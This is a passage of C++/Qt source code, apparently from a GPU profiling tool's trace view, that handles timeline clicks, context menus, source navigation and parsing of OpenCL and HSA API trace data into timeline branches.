{
IOccupancyInfoDataHandler* occInfo = item->GetOccupancyInfo();
acTimelineItem* deviceBlockItem = item->GetDeviceBlock();
if ((occInfo != nullptr && modelIndex.column() == TraceTableModel::TRACE_OCCUPANCY_COLUMN) || (deviceBlockItem != nullptr && modelIndex.column() == TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN))
{
// we are over a cell with either a kernel occupancy figure or a device block pItem
table->setCursor(Qt::PointingHandCursor);
return;
}
table->setCursor(Qt::ArrowCursor);
}
}
void TraceView::TimelineItemClickedHandler(acTimelineItem* pItem)
{
// show the corresponding API trace pItem when clicking a timeline pItem
if (pItem != nullptr)
{
// Update properties with the details of this pItem:
DisplayItemInPropertiesView(pItem);
m_areTimelinePropertiesSet = true;
// first get the correct pItem (if user clicks a timeline pItem for a device)
HostAPITimelineItem* hostApiItem = dynamic_cast<HostAPITimelineItem*>(pItem);
PerfMarkerTimelineItem* pPerfItem = dynamic_cast<PerfMarkerTimelineItem*>(pItem);
TraceTableItem* pTableItem = nullptr;
if (hostApiItem != nullptr)
{
pItem = hostApiItem->hostItem();
}
APITimelineItem* apiItem = dynamic_cast<APITimelineItem*>(pItem);
if (apiItem != nullptr)
{
pTableItem = apiItem->traceTableItem();
}
if (pPerfItem != nullptr)
{
pTableItem = pPerfItem->traceTableItem();
}
if (pItem && pItem->parentBranch() != nullptr)
{
QTreeView* treeview = nullptr;
acTimelineBranch* branch = pItem->parentBranch();
int tabIndex = -1;
while (branch != nullptr && tabIndex == -1)
{
QString strTabTextToFind = branch->text();
tabIndex = GetTabIndex(strTabTextToFind);
branch = branch->parentBranch();
}
if (tabIndex != -1)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
treeview = dynamic_cast<QTreeView*>(m_pTraceTabView->currentWidget());
}
if (treeview != nullptr && pTableItem != nullptr)
{
// select the api that corresponds to the timeline pItem clicked
QModelIndexList selectionList = treeview->model()->match(treeview->model()->index(0, 0), Qt::UserRole, pTableItem->GetUniqueId(), 1, Qt::MatchExactly | Qt::MatchRecursive);
treeview->setCurrentIndex(selectionList.first());
}
}
}
}
void TraceView::TimelineBranchClickedHandler(acTimelineBranch* branch)
{
// show the corresponding API trace tab when clicking a timeline branch
int tabIndex = -1;
while (branch != nullptr && tabIndex == -1)
{
QString strTabTextToFind = branch->text();
tabIndex = GetTabIndex(strTabTextToFind);
branch = branch->parentBranch();
}
if (tabIndex != -1)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
}
}
HSADispatchTimelineItem* CheckBranchForItem(acTimelineBranch* pBranch, unsigned int callIndex, bool recurse = true)
{
if (nullptr != pBranch)
{
for (int i = 0; i < pBranch->itemCount(); i++)
{
HSADispatchTimelineItem* hsaDispatchItem = dynamic_cast<HSADispatchTimelineItem*>(pBranch->getTimelineItem(i));
if (nullptr != hsaDispatchItem && callIndex == (unsigned int)hsaDispatchItem->apiIndex())
{
return hsaDispatchItem;
}
}
if (recurse)
{
for (int i = 0; i < pBranch->subBranchCount(); i++)
{
HSADispatchTimelineItem* item = CheckBranchForItem(pBranch->getSubBranch(i), callIndex, recurse);
if (nullptr != item)
{
return item;
}
}
}
}
return nullptr;
}
void TraceView::SummaryPageLinkClickedHandler(const QString& strPageName, unsigned int threadID, unsigned int callIndex, AnalyzerHTMLViewType viewType)
{
QString strHostThread = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadID);
// determine if the page containing the link is an HSA page (by looking at the prefix of the page)
QString strPrefix = GPU_STR_TraceViewOpenCL;
QStringList pageNameTokens = strPageName.split(' ');
if (pageNameTokens.count() > 0)
{
if (pageNameTokens[0] == GPU_STR_TraceViewHSA)
{
strPrefix = GPU_STR_TraceViewHSA;
}
}
switch (viewType)
{
case AnalyzerHTMLViewType_TimelineHost:
case AnalyzerHTMLViewType_TimelineDevice:
{
acTimelineBranch* pBranch = m_pTimeline->getBranchFromText(strHostThread, false);
if (nullptr != pBranch)
{
// find subbranch with the specified prefix name
for (int i = 0; i < pBranch->subBranchCount(); i++)
{
if (pBranch->getSubBranch(i)->text() == strPrefix)
{
pBranch = pBranch->getSubBranch(i);
break;
}
}
}
if (nullptr != pBranch)
{
// get the specified timeline item
acTimelineItem* pItem = pBranch->getTimelineItem(callIndex);
if (nullptr != pItem)
{
// if the item has a device item, then show that
DispatchAPITimelineItem* pEnqueueItem = dynamic_cast<DispatchAPITimelineItem*>(pItem);
if ((AnalyzerHTMLViewType_TimelineDevice == viewType) && (nullptr != pEnqueueItem) && (nullptr != pEnqueueItem->deviceItem()))
{
m_pTimeline->ZoomToItem(pEnqueueItem->deviceItem(), true);
}
else
{
m_pTimeline->ZoomToItem(pItem, true);
}
}
}
break;
}
case AnalyzerHTMLViewType_TimelineDeviceNoAPI:
{
// there is not a host-side API for this -- most likely an HSA kernel dispatch
acTimelineBranch* pBranch = m_pTimeline->getBranchFromText(GPU_STR_TraceViewHSA, false, false);
if (nullptr != pBranch)
{
HSADispatchTimelineItem* pItem = CheckBranchForItem(pBranch, callIndex);
if (nullptr != pItem)
{
m_pTimeline->ZoomToItem(pItem, true);
}
}
break;
}
case AnalyzerHTMLViewType_Trace:
{
QTreeView* treeview = nullptr;
for (int tabIndex = 0; tabIndex < m_pTraceTabView->count(); tabIndex++)
{
if (m_pTraceTabView->tabText(tabIndex) == strHostThread)
{
m_pTraceTabView->setCurrentIndex(tabIndex);
treeview = dynamic_cast<QTreeView*>(m_pTraceTabView->currentWidget());
break;
}
}
if (treeview != nullptr)
{
QString strUniqueId = strPrefix;
strUniqueId.append('.').append(QString::number(callIndex));
QModelIndexList selectionList = treeview->model()->match(treeview->model()->index(0, 0), Qt::UserRole, QVariant::fromValue(strUniqueId), 1, Qt::MatchExactly | Qt::MatchRecursive);
if (!selectionList.empty())
{
treeview->setCurrentIndex(selectionList.first());
}
else
{
// TODO: display a message that you can't navigate to the api because it wasnt loaded (because it was an API after the 200k limit)
}
}
break;
}
default:
break;
}
}
void TraceView::TraceTableContextMenuHandler(const QPoint& pt)
{
TraceTable* table = dynamic_cast<TraceTable*>(sender());
if (table != nullptr)
{
// get the thread and callindex
int threadId = table->GetThreadId();
QString strMenuText(GPU_STR_TraceViewGoToSource);
bool isSourceCodeEnabled = false;
bool isCopyEnabled = false;
bool isSelectAllEnabled = false;
bool isExpandEnabled = false;
QModelIndex index = table->indexAt(pt);
QString strUniqueId = table->model()->data(index, Qt::UserRole).toString();
QStringList uniqueIdTokens = strUniqueId.split(".");
int row = -1;
AGP_TODO("need to revisit if symbol info becomes available for HSA APIs")
isExpandEnabled = table->ShouldExpandBeEnabled();
if (uniqueIdTokens.count() > 1 && (uniqueIdTokens[0] == GPU_STR_TraceViewOpenCL || uniqueIdTokens[0] == GPU_STR_TraceViewHSA))
{
bool ok;
row = uniqueIdTokens[1].toInt(&ok);
if (!ok)
{
row = -1;
}
}
// Check if copy and select all actions are enabled:
isCopyEnabled = !table->selectionModel()->selectedIndexes().isEmpty();
isSelectAllEnabled = (table->model()->rowCount() > 0);
if (row >= 0)
{
// get the symbol info for that call, store it in m_pSymbolInfo for use in the menu trigger handler
m_pSymbolInfo = GetSymbolInfo(threadId, row);
}
if (m_pSymbolInfo != nullptr)
{
isSourceCodeEnabled = true;
}
else
{
// change the caption if the option to allow source code navigation is not enabled (gives a hint to the user)
if (!SessionHasSymbolInformation())
{
strMenuText.append(QString(" (Enable navigation to source code on the \"%1\" project setting page.)").arg(Util::ms_APP_TRACE_OPTIONS_PAGE));
}
isSourceCodeEnabled = false;
}
// disable context menu actions on selection of more then 1 row (not copy and select all)
bool isMultiRowSelection = (table->NumOfSelectedRows() > 1);
m_pGotoSourceAction->setText(strMenuText);
m_pGotoSourceAction->setEnabled(isSourceCodeEnabled && !isMultiRowSelection);
m_pExpandAllAction->setEnabled(isExpandEnabled);
m_pCollapseAllAction->setEnabled(isExpandEnabled);
m_pZoomInTimelineAction->setEnabled(isCopyEnabled && !isMultiRowSelection);
m_pCopyAction->setEnabled(isCopyEnabled);
m_pSelectAllAction->setEnabled(isSelectAllEnabled);
m_pTraceTableContextMenu->exec(acMapToGlobal(table, pt));
}
}
void TraceView::OnGotoSource()
{
if (m_pSymbolInfo != nullptr)
{
osFilePath filePath(acQStringToGTString(m_pSymbolInfo->FileName()));
if (filePath.isEmpty())
{
QString strExtraInfo;
strExtraInfo = GP_Str_InvalidDebugInfo;
// if file name, api name, symbol name, and line number are all empty, then that is an indication that there is no entry in the .st file for the selected API
if (m_pSymbolInfo->ApiName().isEmpty() && m_pSymbolInfo->SymbolName().isEmpty() && m_pSymbolInfo->LineNumber() == 0)
{
strExtraInfo += QString(GP_Str_AppTerminatedUnexpectedly).arg(Util::ms_ENABLE_TIMEOUT_OPTION);
}
Util::ShowWarningBox(QString(GP_Str_NoSourceInfoForSelectedAPI).arg(strExtraInfo));
}
else if (filePath.exists() && filePath.isRegularFile())
{
afApplicationCommands* pApplicationCommands = afApplicationCommands::instance();
GT_IF_WITH_ASSERT(pApplicationCommands != nullptr)
{
pApplicationCommands->OpenFileAtLine(filePath, m_pSymbolInfo->LineNumber(), -1);
}
}
else
{
// check to see if this file is a file from an installed sample file (in this case, the path in the debug info might not match the path to the file on disk)
filePath = Util::GetInstalledPathForSampleFile(filePath);
if (filePath.exists() && filePath.isRegularFile())
{
afApplicationCommands* pApplicationCommands = afApplicationCommands::instance();
GT_IF_WITH_ASSERT(pApplicationCommands != nullptr)
{
pApplicationCommands->OpenFileAtLine(filePath, m_pSymbolInfo->LineNumber(), -1);
}
}
else
{
Util::ShowWarningBox(QString(GP_Str_CantAccessSourceForSelectedAPI).arg(acGTStringToQString(filePath.asString())));
}
}
m_pSymbolInfo = nullptr;
}
}
void TraceView::SetAPINum(osThreadId threadId, unsigned int apiNum)
{
TraceTableModel* pTableModel = nullptr;
if (m_modelMap.contains(threadId))
{
pTableModel = m_modelMap[threadId];
}
else
{
pTableModel = new TraceTableModel(this);
pTableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, pTableModel);
}
GT_IF_WITH_ASSERT(pTableModel != nullptr)
{
pTableModel->SetAPICallsNumber(apiNum);
}
}
bool TraceView::CheckStopParsing(quint64 curEndTime)
{
bool stopParsing = false;
// On windows, we are limited with a 2GB memory size, so we limit the API calls load to 200K.
// On linux this limitation is not relevant, so we do not stop parse:
#if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS
stopParsing = m_parseCallsCounter >= s_MAX_TRACE_ENTRIES;
if (stopParsing)
{
// CODEXL-3550: If the API limit was reached, continue to parse additional items (HSA kernel timestamps, perf markers, etc.), up to the point (in time) where api parsing stopped.
// This ensures that the partial timeline shown will at least be complete (in the sense that all items in the given timespan will be shown):
stopParsing = ((0 == m_maxTimestampWhenParsingStopped || curEndTime != std::numeric_limits<quint64>::max()) && curEndTime > m_maxTimestampWhenParsingStopped);
}
if (stopParsing && !m_alreadyDisplayedAPILimitMessage)
{
// We ask the user if they want to continue loading the data at their own risk:
QString userMessage = QString(GPU_STR_APICallsAmountExceedsTheLimitQuestion).arg(s_MAX_TRACE_ENTRIES);
int userAnswer = acMessageBox::instance().question(afGlobalVariablesManager::ProductNameA(), userMessage, QMessageBox::No | QMessageBox::Yes);
m_shouldStopParsing = stopParsing = (userAnswer == QMessageBox::Yes);
m_alreadyDisplayedAPILimitMessage = true;
if (m_shouldStopParsing)
{
m_maxTimestampWhenParsingStopped = curEndTime;
}
}
else if (stopParsing && m_alreadyDisplayedAPILimitMessage)
{
stopParsing = m_shouldStopParsing;
}
#else
(void)(curEndTime); // unused
#endif
return stopParsing;
}
acTimelineBranch* TraceView::AddHSADataTransferBranch(QString srcHandle, QString srcName, QString destHandle, QString destName)
{
acTimelineBranch* returnBranch = GetHSADataTransferBranch(srcHandle, destHandle);
if (returnBranch == nullptr)
{
returnBranch = new(std::nothrow) acTimelineBranch();
if (nullptr != returnBranch)
{
HSADataTransferBranchInfo dataTransferBranchInfo;
dataTransferBranchInfo.m_sourceHandle = srcHandle;
dataTransferBranchInfo.m_sourceName = srcName;
dataTransferBranchInfo.m_destinationHandle = destHandle;
dataTransferBranchInfo.m_destinationName = destName;
dataTransferBranchInfo.m_pTransferBranch = returnBranch;
dataTransferBranchInfo.m_pTransferBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
QString branchText = srcHandle + " (" + srcName + ")" +" -> " + destHandle + " (" + destName + ")";
dataTransferBranchInfo.m_pTransferBranch->setText(branchText);
m_hsaDataTransferBranches.push_back(dataTransferBranchInfo);
}
}
return returnBranch;
}
acTimelineBranch* TraceView::GetHSADataTransferBranch(QString src, QString dest)
{
acTimelineBranch* returnBranch = nullptr;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
if (src == it->m_sourceHandle && dest == it->m_destinationHandle)
{
returnBranch = it->m_pTransferBranch;
break;
}
}
return returnBranch;
}
void TraceView::OnParseCallHandler(AtpInfoType apiType, bool& stopParsing)
{
m_parseCallsCounter++;
void* pPtr;
if (!AtpUtils::Instance()->IsModuleLoaded())
{
AtpUtils::Instance()->LoadModule();
}
AtpDataHandlerFunc pAtpDataHandler_func = AtpUtils::Instance()->GetAtpDataHandlerFunc();
if (nullptr != pAtpDataHandler_func)
{
pAtpDataHandler_func(&pPtr);
IAtpDataHandler* pAtpDataHandler = reinterpret_cast<IAtpDataHandler*>(pPtr);
switch (apiType)
{
case OPENCL_INFO:
{
m_api = APIToTrace_OPENCL;
ICLAPIInfoDataHandler* clApiInfoHandler = pAtpDataHandler->GetCLApiInfoDataHandler();
stopParsing = CheckStopParsing(clApiInfoHandler->GetApiInfoDataHandler()->GetApiEndTime());
if (!stopParsing)
{
HandleCLAPIInfo(clApiInfoHandler);
}
}
break;
case HSA_INFO:
{
m_api = APIToTrace_HSA;
IHSAAPIInfoDataHandler* hsaApiInfoHandler = pAtpDataHandler->GetHSAApiInfoDataHandler();
stopParsing = CheckStopParsing(hsaApiInfoHandler->GetApiInfoDataHandler()->GetApiEndTime());
if (!stopParsing)
{
HandleHSAAPIInfo(hsaApiInfoHandler);
}
}
break;
case PERF_MARKER_ENTRY:
{
IPerfMarkerInfoDataHandler* perMarkerApiInfoDataHandler = pAtpDataHandler->GetPerfMarkerInfoDataHandler();
stopParsing = CheckStopParsing(perMarkerApiInfoDataHandler->GetPerfMarkerTimestamp());
if (!stopParsing)
{
HandlePerfMarkerEntry(perMarkerApiInfoDataHandler);
}
}
break;
case SYMBOL_ENTRY:
{
AGP_TODO("should check the module of pSymFileEntry and match it up to that module's APIs. This will be needed to properly support multi-module traces (i.e. traces that contain both HSA and OCL)")
ISymbolFileEntryInfoDataHandler* symbolFileEntryHandler = pAtpDataHandler->GetSymbolFileEntryInfoDataHandler();
stopParsing = CheckStopParsing(std::numeric_limits<quint64>::max());
if (!stopParsing)
{
HandleSymFileEntry(symbolFileEntryHandler);
}
}
break;
default:
break;
}
}
}
void TraceView::OnSetApiNumCallHandler(osThreadId threadId, unsigned int apiNum)
{
this->SetAPINum(threadId, apiNum);
}
void TraceView::OnParserProgressCallHandler(const char* strProgressMessage, unsigned int uiCurItem, unsigned int uiTotalItems)
{
gtString localProgressMsg;
afProgressBarWrapper& theProgressBarWrapper = afProgressBarWrapper::instance();
localProgressMsg.fromASCIIString(strProgressMessage);
// If this is the first item we're reporting to the progress indicator, or if the
// progress dialog is not shown (was hidden by some other stage of the load?)
if (uiCurItem == 0 || theProgressBarWrapper.IsDlgShown() == false)
{
// Make sure the progress dialog is displayed
theProgressBarWrapper.ShowProgressDialog(uiCurItem, uiTotalItems);
theProgressBarWrapper.setProgressText(localProgressMsg);
// Store the message displayed on the progress dialog for later comparison to avoid unnecessary updates
if (nullptr != strProgressMessage)
{
m_currentProgressMessage = strProgressMessage;
}
}
// Update the progress message only if it has changed
if (nullptr != strProgressMessage && m_currentProgressMessage != strProgressMessage)
{
theProgressBarWrapper.setProgressText(localProgressMsg);
m_currentProgressMessage = strProgressMessage;
}
theProgressBarWrapper.updateProgressBar(uiCurItem);
}
acTimelineBranch* TraceView::GetHostBranchForAPI(osThreadId threadId, const QString& branchText)
{
acTimelineBranch* retVal = nullptr;
// first add the root branch, if necessary
QString hostThreadLabel = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadId);
acTimelineBranch* rootBranch = nullptr;
if (m_hostBranchMap.contains(threadId))
{
rootBranch = m_hostBranchMap[threadId];
}
if (rootBranch == nullptr)
{
rootBranch = new acTimelineBranch();
rootBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
rootBranch->setText(hostThreadLabel);
m_hostBranchMap.insert(threadId, rootBranch);
}
retVal = rootBranch;
if (!branchText.isEmpty())
{
// now add the API branch, if necessary
retVal = rootBranch->getSubBranchFromText(branchText, false);
if (retVal == nullptr)
{
retVal = new acTimelineBranch();
retVal->SetBGColor(QColor::fromRgb(230, 230, 230));
retVal->setText(branchText);
rootBranch->addSubBranch(retVal);
}
}
return retVal;
}
bool TraceView::LoadSessionUsingBackendParser(const osFilePath& sessionFile)
{
bool retVal = false;
if (!AtpUtils::Instance()->IsModuleLoaded())
{
AtpUtils::Instance()->LoadModule();
}
AtpParserFunc parserFunc = AtpUtils::Instance()->GetAtpParserFunctionPointer();
if (nullptr != parserFunc)
{
AtpUtils::Instance()->AddToCallBackHandlerList(this);
std::string sessionFileAsString = sessionFile.asString().asASCIICharArray();
retVal = parserFunc(sessionFileAsString.c_str(), OnParse, SetApiNum, ReportProgressOnParsing);
AtpUtils::Instance()->RemoveHandlerFromCallBackHandlerList(this);
}
return retVal;
}
void TraceView::HandleCLAPIInfo(ICLAPIInfoDataHandler* pClApiInfo)
{
IAPIInfoDataHandler* pApiInfo = pClApiInfo->GetApiInfoDataHandler();
osThreadId threadId = pApiInfo->GetApiThreadId();
TraceTableModel* tableModel = nullptr;
acTimelineItem* deviceBlockItem = nullptr;
IOccupancyInfoDataHandler* occupancyInfo = nullptr;
if (m_modelMap.contains(threadId))
{
tableModel = m_modelMap[threadId];
}
else
{
tableModel = new TraceTableModel(this);
// Show all columns for CL API:
tableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, tableModel);
}
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, GPU_STR_TraceViewOpenCL);
GT_ASSERT(hostBranch != nullptr);
unsigned int apiID = pClApiInfo->GetCLApiId();
std::string strComment = pClApiInfo->GetCLApiComment();
if (!strComment.empty())
{
std::string argList = pApiInfo->GetApiArgListString();
argList.append(" /* ").append(strComment).append(" */");
}
QString apiName;
if (apiID < CL_FUNC_TYPE_Unknown)
{
apiName = CLAPIDefs::Instance()->GetOpenCLAPIString(CL_FUNC_TYPE(apiID));
}
else
{
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
quint64 itemStartTime = pApiInfo->GetApiStartTime();
quint64 itemEndTime = pApiInfo->GetApiEndTime();
// check for reasonable timestamps
GT_ASSERT((itemEndTime >= itemStartTime) && itemStartTime != 0);
APITimelineItem* pAPITimelineItem = nullptr;
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
if (m_lastDeviceItemIdx != -1 && (apiID == CL_FUNC_TYPE_clFinish || apiID == CL_FUNC_TYPE_clWaitForEvents || apiID == CL_FUNC_TYPE_clGetEventInfo))
{
QString syncParams = QString::fromStdString(pApiInfo->m_ArgList);
QString enqueueParams = tableModel->data(tableModel->index(m_lastDeviceItemIdx, TraceTableModel::TRACE_PARAMETERS_COLUMN), Qt::DisplayRole).toString();
if (apiID == CL_FUNC_TYPE_clFinish)
{
// if the cmdQ of the clFinish call matches the cmdQ of the last enqueue call, then set the completion latency for the enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
if (syncParamList.first().trimmed() == enqParamList.first().trimmed())
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
else if (apiID == CL_FUNC_TYPE_clWaitForEvents)
{
// if the event list of the clWaitForEvents call contains the event of the last enqueue call, then set the completion latency for the enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
enqueueParams = enqParamList.last().trimmed();
int beginIndex = enqueueParams.indexOf('[');
int endIndex = enqueueParams.indexOf(']');
enqueueParams = enqueueParams.mid(beginIndex + 1, endIndex - beginIndex - 1);
syncParams = syncParamList.last().trimmed();
beginIndex = syncParams.indexOf('[');
endIndex = syncParams.indexOf(']');
syncParams = syncParams.mid(beginIndex + 1, endIndex - beginIndex - 1);
syncParamList = syncParams.split(',');
if (syncParamList.contains(enqueueParams.trimmed()))
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
else if (apiID == CL_FUNC_TYPE_clGetEventInfo)
{
// if clGetEventInfo indicates COMPLETE and the event matches the event of the last enqueue call, then set the completion latency for the enqueue call
if (syncParams.contains("[CL_COMPLETE]"))
{
// check if the event here matches the event of the last enqueue call
QStringList syncParamList = syncParams.split(';');
QStringList enqParamList = enqueueParams.split(';');
syncParams = syncParamList[0].trimmed();
enqueueParams = enqParamList.last().trimmed();
if (enqueueParams.contains(syncParams))
{
m_lastDeviceItem->setCompletionLatencyTime(itemEndTime);
m_lastDeviceItem = nullptr;
}
}
}
}
#endif
unsigned int dispSequenceId = pApiInfo->GetApiDisplaySequenceId();
if (apiID == CL_FUNC_TYPE_clGetEventInfo)
{
// don't assign an apiIndex to clGetEventInfo
pAPITimelineItem = new CLGetEventInfoTimelineItem(itemStartTime, itemEndTime, dispSequenceId); //TODO verify that the tooltip show the index as "after index XXX" correctly
}
else
{
pAPITimelineItem = new APITimelineItem(itemStartTime, itemEndTime, dispSequenceId);
}
pAPITimelineItem->setText(apiName);
pAPITimelineItem->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
pAPITimelineItem->setForegroundColor(Qt::white);
CLAPIType apiType = pClApiInfo->GetCLApiType();
if ((apiType & CL_ENQUEUE_BASE_API) == CL_ENQUEUE_BASE_API) // this is an enqueue api
{
ICLEnqueueApiInfoDataHandler* enqueueApiInfo;
pClApiInfo->IsCLEnqueueAPI(&enqueueApiInfo);
GT_IF_WITH_ASSERT(enqueueApiInfo != nullptr)
{
unsigned int cmdType = enqueueApiInfo->GetCLCommandTypeEnum();
QString strCmdType = QString::fromStdString(enqueueApiInfo->GetCLCommandTypeString());
quint64 gpuStart = enqueueApiInfo->GetCLRunningTimestamp();
quint64 gpuEnd = enqueueApiInfo->GetCLCompleteTimestamp();
quint64 gpuQueued = enqueueApiInfo->GetCLQueueTimestamp();
quint64 gpuSubmit = enqueueApiInfo->GetCLSubmitTimestamp();
QString strQueueHandle = QString::fromStdString(enqueueApiInfo->GetCLCommandQueueHandleString());
unsigned int queueId = enqueueApiInfo->GetCLQueueId();
QString strContextHandle = QString::fromStdString(enqueueApiInfo->GetCLContextHandleString());
unsigned int contextId = enqueueApiInfo->GetCLContextId();
QString deviceNameStr = QString::fromStdString(enqueueApiInfo->GetCLDeviceNameString());
int nOccIndex = 0;
if (m_oclThreadOccIndexMap.contains(threadId))
{
nOccIndex = m_oclThreadOccIndexMap[threadId];
}
if ((gpuEnd < gpuStart && (apiID < CL_FUNC_TYPE_clEnqueueMapBuffer || apiID > CL_FUNC_TYPE_clEnqueueUnmapMemObject)) || gpuStart < gpuSubmit || gpuSubmit < gpuQueued)
{
if (cmdType <= CL_COMMAND_TASK && (deviceNameStr != GPU_STR_TraceViewCpuDevice))
{
// if this is a kernel dispatch without valid timestamps, on a non-CPU device, then bump the
// occIndex so that subsequent dispatches are matched up with the correct occupancy info
// This fixes BUG355468
nOccIndex++;
}
}
else
{
// Get or create the branch for this queue:
OCLQueueBranchInfo* pBranchInfo = GetBranchInfo(contextId, queueId, strContextHandle, deviceNameStr, strQueueHandle);
if ((apiType & CL_ENQUEUE_KERNEL) == CL_ENQUEUE_KERNEL) // TODO does CL_COMMAND_NATIVE_KERNEL need special handling here????
{
ICLKernelApiInfoDataHandler* kernelApiInfo;
pClApiInfo->IsCLKernelApiInfo(&kernelApiInfo);
GT_IF_WITH_ASSERT((kernelApiInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
CLKernelTimelineItem* gpuItem = new CLKernelTimelineItem(gpuStart, gpuEnd, displaySeqId);
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = gpuItem;
m_lastDeviceItemIdx = pApiInfo->m_uiSeqID;
#endif
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setText(QString::fromStdString(kernelApiInfo->GetCLKernelNameString()));
gpuItem->setGlobalWorkSize(QString::fromStdString(kernelApiInfo->GetCLKernelGlobalWorkGroupSize()));
gpuItem->setLocalWorkSize(QString::fromStdString(kernelApiInfo->GetCLKernelWorkGroupSize()));
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
deviceBlockItem = gpuItem;
if (m_pCurrentSession->LoadAndGetOccupancyTable().contains(threadId))
{
const QList<const IOccupancyInfoDataHandler*> occupancyInfosList = m_pCurrentSession->GetOccupancyTable()[threadId];
if (m_oclThreadOccIndexMap.contains(threadId))
{
nOccIndex = m_oclThreadOccIndexMap[threadId];
}
if (nOccIndex < occupancyInfosList.count())
{
std::string tempString(occupancyInfosList[nOccIndex]->GetDeviceName());
QString deviceName = QString::fromStdString(tempString);
if (Util::CheckOccupancyDeviceName(deviceName, deviceNameStr))
{
occupancyInfo = const_cast<IOccupancyInfoDataHandler*>(occupancyInfosList[nOccIndex]);
gpuItem->setOccupancyInfo(occupancyInfo);
nOccIndex++;
}
}
}
m_oclThreadOccIndexMap[threadId] = nOccIndex;
pBranchInfo->m_pKernelBranch->addTimelineItem(gpuItem);
}
}
else if ((apiType & CL_ENQUEUE_MEM) == CL_ENQUEUE_MEM)
{
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
ICLMemApiInfoDataHandler* memApiInfo;
pClApiInfo->IsCLMemoryApiInfo(&memApiInfo);
GT_IF_WITH_ASSERT((memApiInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pMemoryBranch != nullptr))
{
CLAPITimelineItem* gpuItem = nullptr;
//if ((cmdType >= CL_COMMAND_READ_BUFFER && cmdType <= CL_COMMAND_MAP_IMAGE) || (cmdType >= CL_COMMAND_READ_BUFFER_RECT && cmdType <= CL_COMMAND_COPY_BUFFER_RECT))
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
gpuItem = new CLMemTimelineItem(gpuStart, gpuEnd, displaySeqId);
quint64 transferSize;
unsigned int uiTransferSize = memApiInfo->GetCLMemoryTransferSize();
transferSize = static_cast<quint64>(uiTransferSize);
(reinterpret_cast<CLMemTimelineItem*>(gpuItem))->setDataTransferSize(transferSize);
gpuItem->setText(CLMemTimelineItem::getDataSizeString(transferSize, 1) + " " + strCmdType.mid(11));
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
pBranchInfo->m_pMemoryBranch->addTimelineItem(gpuItem);
deviceBlockItem = gpuItem;
}
}
else if ((apiType & CL_ENQUEUE_OTHER_OPERATIONS) == CL_ENQUEUE_OTHER_OPERATIONS)
{
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
ICLOtherEnqueueApiInfoDataHandler* pOtherEnqueueOperationsInfo;
pClApiInfo->IsCLEnqueueOtherOperations(&pOtherEnqueueOperationsInfo);
GT_IF_WITH_ASSERT((pOtherEnqueueOperationsInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
CLAPITimelineItem* gpuItem = nullptr;
quint64 startTime = enqueueApiInfo->GetCLRunningTimestamp();
quint64 endTime = enqueueApiInfo->GetCLCompleteTimestamp();
// Prepare the command name:
QString commandName = strCmdType.replace("CL_COMMAND_", "");
if ((apiType & CL_ENQUEUE_DATA_OPERATIONS) == CL_ENQUEUE_DATA_OPERATIONS)
{
// if (cmdType == CL_COMMAND_FILL_IMAGE) || (cmdType == CL_COMMAND_FILL_BUFFER)) || (cmdType == CL_COMMAND_SVM_MAP) || cmdType == CL_COMMAND_SVM_UNMAP)
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
gpuItem = new CLDataEnqueueOperationsTimelineItem(startTime, endTime, displaySeqId);
ICLDataEnqueueApiInfoDataHandler* pDataEnqueueOperationsInfo;
pClApiInfo->IsCLDataEnqueueApi(&pDataEnqueueOperationsInfo);
